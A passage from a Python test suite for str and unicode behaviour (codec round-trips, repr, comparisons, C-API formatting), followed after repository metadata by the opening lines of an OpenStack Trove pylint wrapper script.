    self.assertEqual('hello'.encode('utf-8'), b'hello')
    self.assertEqual('hello'.encode('utf-8'), b'hello')
    self.assertEqual('hello'.encode('utf-16-le'), b'h\000e\000l\000l\000o\000')
    self.assertEqual('hello'.encode('utf-16-be'), b'\000h\000e\000l\000l\000o')
    self.assertEqual('hello'.encode('latin-1'), b'hello')
    # Default encoding is utf-8
    self.assertEqual('\u2603'.encode(), b'\xe2\x98\x83')
    # Roundtrip safety for BMP (just the first 1024 chars)
    for c in range(1024):
        u = chr(c)
        for encoding in ('utf-7', 'utf-8', 'utf-16', 'utf-16-le',
                         'utf-16-be', 'raw_unicode_escape',
                         'unicode_escape', 'unicode_internal'):
            with warnings.catch_warnings():
                # unicode-internal has been deprecated
                warnings.simplefilter("ignore", DeprecationWarning)
                self.assertEqual(str(u.encode(encoding),encoding), u)
    # Roundtrip safety for BMP (just the first 256 chars)
    for c in range(256):
        u = chr(c)
        for encoding in ('latin-1',):
            self.assertEqual(str(u.encode(encoding),encoding), u)
    # Roundtrip safety for BMP (just the first 128 chars)
    for c in range(128):
        u = chr(c)
        for encoding in ('ascii',):
            self.assertEqual(str(u.encode(encoding),encoding), u)
    # Roundtrip safety for non-BMP (just a few chars)
    with warnings.catch_warnings():
        # unicode-internal has been deprecated
        warnings.simplefilter("ignore", DeprecationWarning)
        u = '\U00010001\U00020002\U00030003\U00040004\U00050005'
        for encoding in ('utf-8', 'utf-16', 'utf-16-le', 'utf-16-be',
                         'raw_unicode_escape',
                         'unicode_escape', 'unicode_internal'):
            self.assertEqual(str(u.encode(encoding),encoding), u)
    # UTF-8 must be roundtrip safe for all code points
    # (except surrogates, which are forbidden).
    u = ''.join(map(chr, list(range(0, 0xd800)) +
                         list(range(0xe000, 0x110000))))
    for encoding in ('utf-8',):
        self.assertEqual(str(u.encode(encoding),encoding), u)
def test_codecs_charmap(self):
    """Charmap codecs must round-trip every byte for which they define
    a mapping (codecs with holes are listed but commented out)."""
    # 0-127
    s = bytes(range(128))
    for encoding in (
        'cp037', 'cp1026', 'cp273',
        'cp437', 'cp500', 'cp720', 'cp737', 'cp775', 'cp850',
        'cp852', 'cp855', 'cp858', 'cp860', 'cp861', 'cp862',
        'cp863', 'cp865', 'cp866', 'cp1125',
        'iso8859_10', 'iso8859_13', 'iso8859_14', 'iso8859_15',
        'iso8859_2', 'iso8859_3', 'iso8859_4', 'iso8859_5', 'iso8859_6',
        'iso8859_7', 'iso8859_9',
        'koi8_r', 'koi8_t', 'koi8_u', 'kz1048', 'latin_1',
        'mac_cyrillic', 'mac_latin2',
        'cp1250', 'cp1251', 'cp1252', 'cp1253', 'cp1254', 'cp1255',
        'cp1256', 'cp1257', 'cp1258',
        'cp856', 'cp857', 'cp864', 'cp869', 'cp874',
        'mac_greek', 'mac_iceland','mac_roman', 'mac_turkish',
        'cp1006', 'iso8859_8',
        ### These have undefined mappings:
        #'cp424',
        ### These fail the round-trip:
        #'cp875'
        ):
        self.assertEqual(str(s, encoding).encode(encoding), s)
    # 128-255
    s = bytes(range(128, 256))
    for encoding in (
        'cp037', 'cp1026', 'cp273',
        'cp437', 'cp500', 'cp720', 'cp737', 'cp775', 'cp850',
        'cp852', 'cp855', 'cp858', 'cp860', 'cp861', 'cp862',
        'cp863', 'cp865', 'cp866', 'cp1125',
        'iso8859_10', 'iso8859_13', 'iso8859_14', 'iso8859_15',
        'iso8859_2', 'iso8859_4', 'iso8859_5',
        'iso8859_9', 'koi8_r', 'koi8_u', 'latin_1',
        'mac_cyrillic', 'mac_latin2',
        ### These have undefined mappings:
        #'cp1250', 'cp1251', 'cp1252', 'cp1253', 'cp1254', 'cp1255',
        #'cp1256', 'cp1257', 'cp1258',
        #'cp424', 'cp856', 'cp857', 'cp864', 'cp869', 'cp874',
        #'iso8859_3', 'iso8859_6', 'iso8859_7', 'koi8_t', 'kz1048',
        #'mac_greek', 'mac_iceland','mac_roman', 'mac_turkish',
        ### These fail the round-trip:
        #'cp1006', 'cp875', 'iso8859_8',
        ):
        self.assertEqual(str(s, encoding).encode(encoding), s)
def test_concatenation(self):
    """Adjacent string literals must be merged at compile time."""
    for joined in ("abc" "def", "abc" "def", "abc" "def"):
        self.assertEqual(joined, "abcdef")
    for joined in ("abc" "def" "ghi", "abc" "def" "ghi"):
        self.assertEqual(joined, "abcdefghi")
def test_printing(self):
    """print() must accept str positional args plus end=/file= keywords."""
    class Sink:
        # Discards everything; we only care that print() does not raise.
        def write(self, text):
            pass
    sink = Sink()
    print('abc', file=sink)
    print('abc', 'def', file=sink)
    print('abc', 'def', file=sink)
    print('abc', 'def', file=sink)
    print('abc\n', file=sink)
    print('abc\n', end=' ', file=sink)
    print('abc\n', end=' ', file=sink)
    print('def\n', file=sink)
    print('def\n', file=sink)
def test_ucs4(self):
    """raw-unicode-escape must round-trip non-BMP code points and report
    correct offsets for out-of-range \\U escapes."""
    text = '\U00100000'
    self.assertEqual(
        text,
        text.encode("raw-unicode-escape").decode("raw-unicode-escape"))
    for escape in (br'\U00100000', br'\U00010000'):
        decoded = escape.decode("raw-unicode-escape")
        self.assertEqual(decoded.encode("raw-unicode-escape"), escape)
    try:
        br'\U11111111'.decode("raw-unicode-escape")
    except UnicodeDecodeError as exc:
        # The error span must cover the whole 10-character escape.
        self.assertEqual(exc.start, 0)
        self.assertEqual(exc.end, 10)
    else:
        self.fail("Should have raised UnicodeDecodeError")
def test_conversion(self):
    """str() must honor __str__ overrides and preserve the subclass type
    when __str__ returns self."""
    # Make sure __str__() works properly
    class ObjectToStr:
        def __str__(self):
            return "foo"
    class StrSubclassToStr(str):
        def __str__(self):
            return "foo"
    class StrSubclassToStrSubclass(str):
        # Doubles the content so identity vs. copying is observable.
        def __new__(cls, content=""):
            return str.__new__(cls, 2*content)
        def __str__(self):
            return self
    self.assertEqual(str(ObjectToStr()), "foo")
    self.assertEqual(str(StrSubclassToStr("bar")), "foo")
    s = str(StrSubclassToStrSubclass("foo"))
    self.assertEqual(s, "foofoo")
    self.assertIs(type(s), StrSubclassToStrSubclass)
    # StrSubclass is presumably defined at module level elsewhere in
    # this file — TODO confirm.
    s = StrSubclass(StrSubclassToStrSubclass("foo"))
    self.assertEqual(s, "foofoo")
    self.assertIs(type(s), StrSubclass)
def test_unicode_repr(self):
    """repr() must pass backslashes from a __repr__ result through verbatim."""
    class BackslashRepr1:
        def __repr__(self):
            return '\\n'
    class BackslashRepr2:
        def __repr__(self):
            return '\\n'
    self.assertEqual(repr(BackslashRepr1()), '\\n')
    self.assertEqual(repr(BackslashRepr2()), '\\n')
def test_printable_repr(self):
    """repr() must leave printable astral characters alone and escape
    nonprintable ones."""
    self.assertEqual(repr('\U00010000'), "'%c'" % (0x10000,))
    self.assertEqual(repr('\U00014000'), "'\\U00014000'")
@unittest.skipIf(sys.maxsize > (1 << 32) or struct.calcsize('P') != 4,
                 'only applies to 32-bit platforms')
def test_expandtabs_overflows_gracefully(self):
    """expandtabs() must raise OverflowError, not crash, on a huge tabsize.

    Only meaningful on 32-bit platforms: expandtabs takes an int, not a
    64-bit C long.  If that ever changes, drop the skip above.
    """
    self.assertRaises(OverflowError, 't\tt\t'.expandtabs, sys.maxsize)
@support.cpython_only
def test_expandtabs_optimization(self):
    """expandtabs() on a tab-free string must return it unchanged (CPython)."""
    text = 'abc'
    self.assertIs(text.expandtabs(), text)
def test_raiseMemError(self):
    """A string allocation just under the address-space limit must raise
    MemoryError instead of crashing, for every internal char width."""
    # Struct sizes below mirror CPython's PyASCIIObject/PyCompactUnicodeObject
    # layouts for the two pointer widths — TODO confirm against the headers
    # of the interpreter version under test.
    if struct.calcsize('P') == 8:
        # 64 bits pointers
        ascii_struct_size = 48
        compact_struct_size = 72
    else:
        # 32 bits pointers
        ascii_struct_size = 24
        compact_struct_size = 36
    for char in ('a', '\xe9', '\u20ac', '\U0010ffff'):
        code = ord(char)
        if code < 0x100:
            char_size = 1 # sizeof(Py_UCS1)
            struct_size = ascii_struct_size
        elif code < 0x10000:
            char_size = 2 # sizeof(Py_UCS2)
            struct_size = compact_struct_size
        else:
            char_size = 4 # sizeof(Py_UCS4)
            struct_size = compact_struct_size
        # Note: sys.maxsize is half of the actual max allocation because of
        # the signedness of Py_ssize_t. Strings of maxlen-1 should in principle
        # be allocatable, given enough memory.
        maxlen = ((sys.maxsize - struct_size) // char_size)
        alloc = lambda: char * maxlen
        self.assertRaises(MemoryError, alloc)
        self.assertRaises(MemoryError, alloc)
def test_format_subclass(self):
    """Both %-formatting and str.format must call an overridden __str__."""
    class Overridden(str):
        def __str__(self):
            return '__str__ overridden'
    value = Overridden('xxx')
    self.assertEqual("%s" % value, '__str__ overridden')
    self.assertEqual("{}".format(value), '__str__ overridden')
def test_subclass_add(self):
    """+ and += on str subclasses must dispatch to __add__/__iadd__."""
    class AddOverride(str):
        def __add__(self, other):
            return "3"
    self.assertEqual(AddOverride("4") + AddOverride("5"), "3")
    class IAddOverride(str):
        def __iadd__(self, other):
            return "3"
    accumulator = IAddOverride("1")
    accumulator += "4"
    self.assertEqual(accumulator, "3")
def test_getnewargs(self):
    """str.__getnewargs__ must return a 1-tuple holding an equal copy."""
    original = 'abc'
    args = original.__getnewargs__()
    self.assertEqual(len(args), 1)
    self.assertIsNot(args[0], original)
    self.assertEqual(args[0], original)
def test_resize(self):
    """Resizing a string must clear and then recompute the cached wstr
    representation (PEP 393 internals, via the unicode_internal codec)."""
    for length in range(1, 100, 7):
        # generate a fresh string (refcount=1)
        text = 'a' * length + 'b'
        with support.check_warnings(('unicode_internal codec has been '
                                     'deprecated', DeprecationWarning)):
            # fill wstr internal field
            abc = text.encode('unicode_internal')
            self.assertEqual(abc.decode('unicode_internal'), text)
            # resize text: wstr field must be cleared and then recomputed
            text += 'c'
            abcdef = text.encode('unicode_internal')
            self.assertNotEqual(abc, abcdef)
            self.assertEqual(abcdef.decode('unicode_internal'), text)
def test_compare(self):
    """Comparison operators must be consistent across all four internal
    string representations (ASCII, Latin-1, BMP, astral)."""
    # Issue #17615
    N = 10
    ascii = 'a' * N
    ascii2 = 'z' * N
    latin = '\x80' * N
    latin2 = '\xff' * N
    bmp = '\u0100' * N
    bmp2 = '\uffff' * N
    astral = '\U00100000' * N
    astral2 = '\U0010ffff' * N
    strings = (
        ascii, ascii2,
        latin, latin2,
        bmp, bmp2,
        astral, astral2)
    for text1, text2 in itertools.combinations(strings, 2):
        equal = (text1 is text2)
        self.assertEqual(text1 == text2, equal)
        self.assertEqual(text1 != text2, not equal)
        if equal:
            self.assertTrue(text1 <= text2)
            self.assertTrue(text1 >= text2)
            # text1 is text2: duplicate strings to skip the "str1 == str2"
            # optimization in unicode_compare_eq() and really compare
            # character per character
            copy1 = duplicate_string(text1)
            copy2 = duplicate_string(text2)
            self.assertIsNot(copy1, copy2)
            self.assertTrue(copy1 == copy2)
            self.assertFalse(copy1 != copy2)
            self.assertTrue(copy1 <= copy2)
            self.assertTrue(copy2 >= copy2)
    # Exhaustive ordering matrix between representations.
    self.assertTrue(ascii < ascii2)
    self.assertTrue(ascii < latin)
    self.assertTrue(ascii < bmp)
    self.assertTrue(ascii < astral)
    self.assertFalse(ascii >= ascii2)
    self.assertFalse(ascii >= latin)
    self.assertFalse(ascii >= bmp)
    self.assertFalse(ascii >= astral)
    self.assertFalse(latin < ascii)
    self.assertTrue(latin < latin2)
    self.assertTrue(latin < bmp)
    self.assertTrue(latin < astral)
    self.assertTrue(latin >= ascii)
    self.assertFalse(latin >= latin2)
    self.assertFalse(latin >= bmp)
    self.assertFalse(latin >= astral)
    self.assertFalse(bmp < ascii)
    self.assertFalse(bmp < latin)
    self.assertTrue(bmp < bmp2)
    self.assertTrue(bmp < astral)
    self.assertTrue(bmp >= ascii)
    self.assertTrue(bmp >= latin)
    self.assertFalse(bmp >= bmp2)
    self.assertFalse(bmp >= astral)
    self.assertFalse(astral < ascii)
    self.assertFalse(astral < latin)
    self.assertFalse(astral < bmp2)
    self.assertTrue(astral < astral2)
    self.assertTrue(astral >= ascii)
    self.assertTrue(astral >= latin)
    self.assertTrue(astral >= bmp2)
    self.assertFalse(astral >= astral2)
def test_free_after_iterating(self):
    """Freeing a str mid-iteration (forward or reverse) must not crash."""
    for make_iterator in (iter, reversed):
        support.check_free_after_iterating(self, make_iterator, str)
class CAPITest(unittest.TestCase):
    """Tests for the C-API string helpers, driven through ctypes
    (pythonapi) and the _testcapi extension module."""

    # Test PyUnicode_FromFormat()
    def test_from_format(self):
        support.import_module('ctypes')
        from ctypes import (
            pythonapi, py_object, sizeof,
            c_int, c_long, c_longlong, c_ssize_t,
            c_uint, c_ulong, c_ulonglong, c_size_t, c_void_p)
        name = "PyUnicode_FromFormat"
        _PyUnicode_FromFormat = getattr(pythonapi, name)
        _PyUnicode_FromFormat.restype = py_object

        # str arguments must be wrapped in py_object for the varargs call.
        def PyUnicode_FromFormat(format, *args):
            cargs = tuple(
                py_object(arg) if isinstance(arg, str) else arg
                for arg in args)
            return _PyUnicode_FromFormat(format, *cargs)

        def check_format(expected, format, *args):
            text = PyUnicode_FromFormat(format, *args)
            self.assertEqual(expected, text)

        # ascii format, non-ascii argument
        check_format('ascii\x7f=unicode\xe9',
                     b'ascii\x7f=%U', 'unicode\xe9')

        # non-ascii format, ascii argument: ensure that PyUnicode_FromFormatV()
        # raises an error
        self.assertRaisesRegex(ValueError,
            r'^PyUnicode_FromFormatV\(\) expects an ASCII-encoded format '
            'string, got a non-ASCII byte: 0xe9$',
            PyUnicode_FromFormat, b'unicode\xe9=%s', 'ascii')

        # test "%c"
        check_format('\uabcd',
                     b'%c', c_int(0xabcd))
        check_format('\U0010ffff',
                     b'%c', c_int(0x10ffff))
        with self.assertRaises(OverflowError):
            PyUnicode_FromFormat(b'%c', c_int(0x110000))
        # Issue #18183
        check_format('\U00010000\U00100000',
                     b'%c%c', c_int(0x10000), c_int(0x100000))

        # test "%"
        check_format('%',
                     b'%')
        check_format('%',
                     b'%%')
        check_format('%s',
                     b'%%s')
        check_format('[%]',
                     b'[%%]')
        check_format('%abc',
                     b'%%%s', b'abc')

        # truncated string
        check_format('abc',
                     b'%.3s', b'abcdef')
        check_format('abc[\ufffd',
                     b'%.5s', 'abc[\u20ac]'.encode('utf8'))
        check_format("'\\u20acABC'",
                     b'%A', '\u20acABC')
        check_format("'\\u20",
                     b'%.5A', '\u20acABCDEF')
        check_format("'\u20acABC'",
                     b'%R', '\u20acABC')
        check_format("'\u20acA",
                     b'%.3R', '\u20acABCDEF')
        check_format('\u20acAB',
                     b'%.3S', '\u20acABCDEF')
        check_format('\u20acAB',
                     b'%.3U', '\u20acABCDEF')
        check_format('\u20acAB',
                     b'%.3V', '\u20acABCDEF', None)
        check_format('abc[\ufffd',
                     b'%.5V', None, 'abc[\u20ac]'.encode('utf8'))

        # following tests comes from #7330
        # test width modifier and precision modifier with %S
        check_format("repr= abc",
                     b'repr=%5S', 'abc')
        check_format("repr=ab",
                     b'repr=%.2S', 'abc')
        check_format("repr= ab",
                     b'repr=%5.2S', 'abc')

        # test width modifier and precision modifier with %R
        check_format("repr= 'abc'",
                     b'repr=%8R', 'abc')
        check_format("repr='ab",
                     b'repr=%.3R', 'abc')
        check_format("repr= 'ab",
                     b'repr=%5.3R', 'abc')

        # test width modifier and precision modifier with %A
        check_format("repr= 'abc'",
                     b'repr=%8A', 'abc')
        check_format("repr='ab",
                     b'repr=%.3A', 'abc')
        check_format("repr= 'ab",
                     b'repr=%5.3A', 'abc')

        # test width modifier and precision modifier with %s
        check_format("repr= abc",
                     b'repr=%5s', b'abc')
        check_format("repr=ab",
                     b'repr=%.2s', b'abc')
        check_format("repr= ab",
                     b'repr=%5.2s', b'abc')

        # test width modifier and precision modifier with %U
        check_format("repr= abc",
                     b'repr=%5U', 'abc')
        check_format("repr=ab",
                     b'repr=%.2U', 'abc')
        check_format("repr= ab",
                     b'repr=%5.2U', 'abc')

        # test width modifier and precision modifier with %V
        check_format("repr= abc",
                     b'repr=%5V', 'abc', b'123')
        check_format("repr=ab",
                     b'repr=%.2V', 'abc', b'123')
        check_format("repr= ab",
                     b'repr=%5.2V', 'abc', b'123')
        check_format("repr= 123",
                     b'repr=%5V', None, b'123')
        check_format("repr=12",
                     b'repr=%.2V', None, b'123')
        check_format("repr= 12",
                     b'repr=%5.2V', None, b'123')

        # test integer formats (%i, %d, %u)
        check_format('010',
                     b'%03i', c_int(10))
        check_format('0010',
                     b'%0.4i', c_int(10))
        check_format('-123',
                     b'%i', c_int(-123))
        check_format('-123',
                     b'%li', c_long(-123))
        check_format('-123',
                     b'%lli', c_longlong(-123))
        check_format('-123',
                     b'%zi', c_ssize_t(-123))
        check_format('-123',
                     b'%d', c_int(-123))
        check_format('-123',
                     b'%ld', c_long(-123))
        check_format('-123',
                     b'%lld', c_longlong(-123))
        check_format('-123',
                     b'%zd', c_ssize_t(-123))
        check_format('123',
                     b'%u', c_uint(123))
        check_format('123',
                     b'%lu', c_ulong(123))
        check_format('123',
                     b'%llu', c_ulonglong(123))
        check_format('123',
                     b'%zu', c_size_t(123))

        # test long output
        min_longlong = -(2 ** (8 * sizeof(c_longlong) - 1))
        max_longlong = -min_longlong - 1
        check_format(str(min_longlong),
                     b'%lld', c_longlong(min_longlong))
        check_format(str(max_longlong),
                     b'%lld', c_longlong(max_longlong))
        max_ulonglong = 2 ** (8 * sizeof(c_ulonglong)) - 1
        check_format(str(max_ulonglong),
                     b'%llu', c_ulonglong(max_ulonglong))
        PyUnicode_FromFormat(b'%p', c_void_p(-1))

        # test padding (width and/or precision)
        check_format('123'.rjust(10, '0'),
                     b'%010i', c_int(123))
        check_format('123'.rjust(100),
                     b'%100i', c_int(123))
        check_format('123'.rjust(100, '0'),
                     b'%.100i', c_int(123))
        check_format('123'.rjust(80, '0').rjust(100),
                     b'%100.80i', c_int(123))
        check_format('123'.rjust(10, '0'),
                     b'%010u', c_uint(123))
        check_format('123'.rjust(100),
                     b'%100u', c_uint(123))
        check_format('123'.rjust(100, '0'),
                     b'%.100u', c_uint(123))
        check_format('123'.rjust(80, '0').rjust(100),
                     b'%100.80u', c_uint(123))
        check_format('123'.rjust(10, '0'),
                     b'%010x', c_int(0x123))
        check_format('123'.rjust(100),
                     b'%100x', c_int(0x123))
        check_format('123'.rjust(100, '0'),
                     b'%.100x', c_int(0x123))
        check_format('123'.rjust(80, '0').rjust(100),
                     b'%100.80x', c_int(0x123))

        # test %A
        check_format(r"%A:'abc\xe9\uabcd\U0010ffff'",
                     b'%%A:%A', 'abc\xe9\uabcd\U0010ffff')

        # test %V
        check_format('repr=abc',
                     b'repr=%V', 'abc', b'xyz')

        # Test string decode from parameter of %s using utf-8.
        # b'\xe4\xba\xba\xe6\xb0\x91' is utf-8 encoded byte sequence of
        # '\u4eba\u6c11'
        check_format('repr=\u4eba\u6c11',
                     b'repr=%V', None, b'\xe4\xba\xba\xe6\xb0\x91')

        #Test replace error handler.
        check_format('repr=abc\ufffd',
                     b'repr=%V', None, b'abc\xff')

        # not supported: copy the raw format string. these tests are just here
        # to check for crashes and should not be considered as specifications
        check_format('%s',
                     b'%1%s', b'abc')
        check_format('%1abc',
                     b'%1abc')
        check_format('%+i',
                     b'%+i', c_int(10))
        check_format('%.%s',
                     b'%.%s', b'abc')

    # Test PyUnicode_AsWideChar()
    @support.cpython_only
    def test_aswidechar(self):
        from _testcapi import unicode_aswidechar
        support.import_module('ctypes')
        from ctypes import c_wchar, sizeof
        wchar, size = unicode_aswidechar('abcdef', 2)
        self.assertEqual(size, 2)
        self.assertEqual(wchar, 'ab')
        wchar, size = unicode_aswidechar('abc', 3)
        self.assertEqual(size, 3)
        self.assertEqual(wchar, 'abc')
        wchar, size = unicode_aswidechar('abc', 4)
        self.assertEqual(size, 3)
        self.assertEqual(wchar, 'abc\0')
        wchar, size = unicode_aswidechar('abc', 10)
        self.assertEqual(size, 3)
        self.assertEqual(wchar, 'abc\0')
        wchar, size = unicode_aswidechar('abc\0def', 20)
        self.assertEqual(size, 7)
        self.assertEqual(wchar, 'abc\0def\0')
        # Non-BMP handling depends on the platform's wchar_t width.
        nonbmp = chr(0x10ffff)
        if sizeof(c_wchar) == 2:
            buflen = 3
            nchar = 2
        else: # sizeof(c_wchar) == 4
            buflen = 2
            nchar = 1
        wchar, size = unicode_aswidechar(nonbmp, buflen)
        self.assertEqual(size, nchar)
        self.assertEqual(wchar, nonbmp + '\0')

    # Test PyUnicode_AsWideCharString()
    @support.cpython_only
    def test_aswidecharstring(self):
        from _testcapi import unicode_aswidecharstring
        support.import_module('ctypes')
        from ctypes import c_wchar, sizeof
        wchar, size = unicode_aswidecharstring('abc')
        self.assertEqual(size, 3)
        self.assertEqual(wchar, 'abc\0')
        wchar, size = unicode_aswidecharstring('abc\0def')
        self.assertEqual(size, 7)
        self.assertEqual(wchar, 'abc\0def\0')
        nonbmp = chr(0x10ffff)
        if sizeof(c_wchar) == 2:
            nchar = 2
        else: # sizeof(c_wchar) == 4
            nchar = 1
        wchar, size = unicode_aswidecharstring(nonbmp)
        self.assertEqual(size, nchar)
        self.assertEqual(wchar, nonbmp + '\0')

    # Test PyUnicode_AsUCS4()
    @support.cpython_only
    def test_asucs4(self):
        from _testcapi import unicode_asucs4
        for s in ['abc', '\xa1\xa2', '\u4f60\u597d', 'a\U0001f600',
                  'a\ud800b\udfffc', '\ud834\udd1e']:
            l = len(s)
            self.assertEqual(unicode_asucs4(s, l, 1), s+'\0')
            self.assertEqual(unicode_asucs4(s, l, 0), s+'\uffff')
            self.assertEqual(unicode_asucs4(s, l+1, 1), s+'\0\uffff')
            self.assertEqual(unicode_asucs4(s, l+1, 0), s+'\0\uffff')
            self.assertRaises(SystemError, unicode_asucs4, s, l-1, 1)
            self.assertRaises(SystemError, unicode_asucs4, s, l-2, 0)
            s = '\0'.join([s, s])
            self.assertEqual(unicode_asucs4(s, len(s), 1), s+'\0')
            self.assertEqual(unicode_asucs4(s, len(s), 0), s+'\uffff')

    # Test PyUnicode_FindChar()
    @support.cpython_only
    def test_findchar(self):
        from _testcapi import unicode_findchar
        for str in "\xa1", "\u8000\u8080", "\ud800\udc02", "\U0001f100\U0001f1f1":
            for i, ch in enumerate(str):
                self.assertEqual(unicode_findchar(str, ord(ch), 0, len(str), 1), i)
                self.assertEqual(unicode_findchar(str, ord(ch), 0, len(str), -1), i)
        str = "!>_<!"
        self.assertEqual(unicode_findchar(str, 0x110000, 0, len(str), 1), -1)
        self.assertEqual(unicode_findchar(str, 0x110000, 0, len(str), -1), -1)
        # start < end
        self.assertEqual(unicode_findchar(str, ord('!'), 1, len(str)+1, 1), 4)
        self.assertEqual(unicode_findchar(str, ord('!'), 1, len(str)+1, -1), 4)
        # start >= end
        self.assertEqual(unicode_findchar(str, ord('!'), 0, 0, 1), -1)
        self.assertEqual(unicode_findchar(str, ord('!'), len(str), 0, 1), -1)
        # negative
        self.assertEqual(unicode_findchar(str, ord('!'), -len(str), -1, 1), 0)
        self.assertEqual(unicode_findchar(str, ord('!'), -len(str), -1, -1), 0)

    # Test PyUnicode_CopyCharacters()
    @support.cpython_only
    def test_copycharacters(self):
        from _testcapi import unicode_copycharacters
        strings = [
            'abcde', '\xa1\xa2\xa3\xa4\xa5',
            '\u4f60\u597d\u4e16\u754c\uff01',
            '\U0001f600\U0001f601\U0001f602\U0001f603\U0001f604'
        ]
        for idx, from_ in enumerate(strings):
            # wide -> narrow: exceed maxchar limitation
            for to in strings[:idx]:
                self.assertRaises(
                    SystemError,
                    unicode_copycharacters, to, 0, from_, 0, 5
                )
            # same kind
            for from_start in range(5):
                self.assertEqual(
                    unicode_copycharacters(from_, 0, from_, from_start, 5),
                    (from_[from_start:from_start+5].ljust(5, '\0'),
                     5-from_start)
                )
            for to_start in range(5):
                self.assertEqual(
                    unicode_copycharacters(from_, to_start, from_, to_start, 5),
                    (from_[to_start:to_start+5].rjust(5, '\0'),
                     5-to_start)
                )
            # narrow -> wide
            # Tests omitted since this creates invalid strings.
        s = strings[0]
        self.assertRaises(IndexError, unicode_copycharacters, s, 6, s, 0, 5)
        self.assertRaises(IndexError, unicode_copycharacters, s, -1, s, 0, 5)
        self.assertRaises(IndexError, unicode_copycharacters, s, 0, s, 6, 5)
        self.assertRaises(IndexError, unicode_copycharacters, s, 0, s, -1, 5)
        self.assertRaises(SystemError, unicode_copycharacters, s, 1, s, 0, 5)
        self.assertRaises(SystemError, unicode_copycharacters, s, 0, s, 0, -1)
        self.assertRaises(SystemError, unicode_copycharacters, s, 0, b'', 0, 0)

    @support.cpython_only
    def test_encode_decimal(self):
        from _testcapi import unicode_encodedecimal
        self.assertEqual(unicode_encodedecimal('123'),
                         b'123')
        self.assertEqual(unicode_encodedecimal('\u0663.\u0661\u0664'),
                         b'3.14')
        self.assertEqual(unicode_encodedecimal("\N{EM SPACE}3.14\N{EN SPACE}"),
                         b' 3.14 ')
        self.assertRaises(UnicodeEncodeError,
                          unicode_encodedecimal, "123\u20ac", "strict")
        self.assertRaisesRegex(
            ValueError,
            "^'decimal' codec can't encode character",
            unicode_encodedecimal, "123\u20ac", "replace")

    @support.cpython_only
    def test_transform_decimal(self):
        from _testcapi import unicode_transformdecimaltoascii as transform_decimal
        self.assertEqual(transform_decimal('123'),
                         '123')
        self.assertEqual(transform_decimal('\u0663.\u0661\u0664'),
                         '3.14')
        self.assertEqual(transform_decimal("\N{EM SPACE}3.14\N{EN SPACE}"),
                         "\N{EM SPACE}3.14\N{EN SPACE}")
        self.assertEqual(transform_decimal('123\u20ac'),
                         '123\u20ac')

    @support.cpython_only
    def test_pep393_utf8_caching_bug(self):
        # Issue #25709: Problem with string concatenation and utf-8 cache
        from _testcapi import getargs_s_hash
        for k in 0x24, 0xa4, 0x20ac, 0x1f40d:
            s = ''
            for i in range(5):
                # Due to CPython specific optimization the 's' string can be
                # resized in-place.
                s += chr(k)
                # Parsing with the "s#" format code calls indirectly
                # PyUnicode_AsUTF8AndSize() which creates the UTF-8
                # encoded string cached in the Unicode object.
                self.assertEqual(getargs_s_hash(s), chr(k).encode() * (i + 1))
                # Check that the second call returns the same result
                self.assertEqual(getargs_s_hash(s), chr(k).encode() * (i + 1))
class StringModuleTest(unittest.TestCase):
    """Tests of the private _string module that backs str.format()."""

    def test_formatter_parser(self):
        def parse(format):
            return list(_string.formatter_parser(format))
        # Each tuple is (literal_text, field_name, format_spec, conversion).
        formatter = parse("prefix {2!s}xxx{0:^+10.3f}{obj.attr!s} {z[0]!s:10}")
        self.assertEqual(formatter, [
            ('prefix ', '2', '', 's'),
            ('xxx', '0', '^+10.3f', None),
            ('', 'obj.attr', '', 's'),
            (' ', 'z[0]', '10', 's'),
        ])
        formatter = parse("prefix {} suffix")
        self.assertEqual(formatter, [
            ('prefix ', '', '', None),
            (' suffix', None, None, None),
        ])
        formatter = parse("str")
        self.assertEqual(formatter, [
            ('str', None, None, None),
        ])
        formatter = parse("")
        self.assertEqual(formatter, [])
        formatter = parse("{0}")
        self.assertEqual(formatter, [
            ('', '0', '', None),
        ])
        # Non-str input must be rejected.
        self.assertRaises(TypeError, _string.formatter_parser, 1)

    def test_formatter_field_name_split(self):
        def split(name):
            items = list(_string.formatter_field_name_split(name))
            items[1] = list(items[1])
            return items
        # Each sub-item is (is_attribute, name-or-key).
        self.assertEqual(split("obj"), ["obj", []])
        self.assertEqual(split("obj.arg"), ["obj", [(True, 'arg')]])
        self.assertEqual(split("obj[key]"), ["obj", [(False, 'key')]])
        self.assertEqual(split("obj.arg[key1][key2]"), [
            "obj",
            [(True, 'arg'),
             (False, 'key1'),
             (False, 'key2'),
            ]])
        self.assertRaises(TypeError, _string.formatter_field_name_split, 1)
# Run the whole test suite when executed directly as a script.
if __name__ == "__main__":
    unittest.main()
| true
| true
|
f705051db073657252741e08c08f2ef3c4cd9b70
| 11,317
|
py
|
Python
|
tools/trove-pylint.py
|
a4913994/openstack_trove
|
3b550048dd1e5841ad0f3295679e0f0b913a5687
|
[
"Apache-2.0"
] | 244
|
2015-01-01T12:04:44.000Z
|
2022-03-25T23:38:39.000Z
|
tools/trove-pylint.py
|
a4913994/openstack_trove
|
3b550048dd1e5841ad0f3295679e0f0b913a5687
|
[
"Apache-2.0"
] | 6
|
2015-08-18T08:19:10.000Z
|
2022-03-05T02:32:36.000Z
|
tools/trove-pylint.py
|
a4913994/openstack_trove
|
3b550048dd1e5841ad0f3295679e0f0b913a5687
|
[
"Apache-2.0"
] | 178
|
2015-01-02T15:16:58.000Z
|
2022-03-23T03:30:20.000Z
|
#!/usr/bin/env python
# Copyright 2016 Tesora, Inc.
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import fnmatch
import json
from collections import OrderedDict
import io
import os
import re
import sys
from pylint import lint
from pylint.reporters import text
# Path of the JSON file holding the persisted lint ignore configuration.
DEFAULT_CONFIG_FILE = "tools/trove-pylint.config"
# Path prefixes that are never linted.
DEFAULT_IGNORED_FILES = ['trove/tests']
# Pylint codes and messages ignored by default (none out of the box).
DEFAULT_IGNORED_CODES = []
DEFAULT_IGNORED_MESSAGES = []
# Messages that always fail the check, even when an ignore rule matches.
DEFAULT_ALWAYS_ERROR = [
    "Undefined variable '_'",
    "Undefined variable '_LE'",
    "Undefined variable '_LI'",
    "Undefined variable '_LW'",
    "Undefined variable '_LC'"]
# Operating modes for LintRunner.process().
MODE_CHECK = "check"
MODE_REBUILD = "rebuild"
class Config(object):
